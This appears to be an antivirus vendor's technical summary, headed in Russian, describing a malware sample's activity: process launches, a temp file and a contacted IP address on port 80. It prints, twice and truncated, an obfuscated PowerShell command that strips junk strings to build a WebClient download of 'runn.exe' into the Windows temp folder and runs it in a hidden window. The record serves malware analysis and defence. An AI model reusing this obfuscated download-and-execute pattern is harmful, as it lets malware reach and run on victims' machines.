Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $path = 'cGObTrEdfdD:\winGObTrEdfdDdows\teGObTrEdfdDmp\runn.eGObTrEdfdDxe' -replace 'GObTrEdfdD', '';iex('$wc = new-obGObTrEdfdDject nGObTrEdfdDet.weGObTrEdfdDbclGObTrEdfdDient; $wc.dowGObTrEdf...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\479625.cvr
- '18#.#41.54.166':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $path = 'cGObTrEdfdD:\winGObTrEdfdDdows\teGObTrEdfdDmp\runn.eGObTrEdfdDxe' -replace 'GObTrEdfdD', '';iex('$wc = new-obGObTrEdfdDject nGObTrEdfdDet.weGObTrEdfdDbclGObTrEdfdDient; $wc.dowGObTrEdf...' (со скрытым окном)